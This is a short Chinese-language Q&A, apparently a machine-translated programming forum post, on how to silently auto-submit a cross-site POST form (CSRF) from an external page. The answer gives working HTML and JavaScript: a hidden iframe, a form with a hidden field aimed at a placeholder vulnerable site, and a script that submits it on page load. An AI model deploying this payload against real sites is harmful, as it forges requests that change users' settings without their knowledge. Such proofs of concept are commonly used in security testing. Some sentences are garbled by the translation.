我很想知道如何在沒有任何通知的情況下以靜默方式提交POST表單的CSRF(文檔位置被重定向到POST的URL無聲)。默默提交POST表單(CSRF)的示例
例子:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
於外部網站,什麼話我需要做的,以靜默方式自動觸發這種形式?
一個解決方案是在一幀中以打開窗體的動作等的iframe:
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>